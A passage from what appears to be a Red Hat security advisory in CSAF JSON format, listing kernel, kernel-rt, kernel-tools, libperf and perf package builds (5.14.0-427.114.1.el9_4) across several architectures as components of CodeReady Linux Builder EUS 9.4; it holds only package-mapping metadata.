"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.s390x",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-427.114.1.el9_4.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64"
},
"product_reference": "perf-0:5.14.0-427.114.1.el9_4.x86_64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.4)",
"product_id": "CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"relates_to_product_reference": "CRB-9.4.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
